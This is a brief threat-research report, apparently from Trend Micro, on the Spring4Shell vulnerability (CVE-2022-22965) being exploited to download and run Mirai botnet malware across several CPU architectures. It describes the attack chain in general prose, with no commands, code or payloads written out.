Researchers at Trend Micro Threat Research have observed active exploitation of the Spring4Shell vulnerability for the purpose of weaponizing and executing Mirai botnet malware. Spring4Shell (CVE-2022-22965) is a recently discovered vulnerability in the Spring Framework, a popular Java development platform. You can find our previous coverage of this vulnerability here.
Trend Micro researchers observed this adaptation of the Mirai botnet in early April in the Singapore region. The exploitation of the Spring Framework vulnerability allowed the Mirai operators to retrieve their malware from their own infrastructure using ‘wget’ to download the malicious executable into the ‘/tmp’ folder, change its permissions with ‘chmod’, and execute it. Multiple CPU architecture variants were also observed on the malware file server, including ARM, x86, and MIPS among others. Interestingly, the malicious script used to download the malware to the victim server downloads all of the available CPU architecture variants and attempts to run them all. The compatible ones will run, while the rest won’t. The files are all then removed after execution.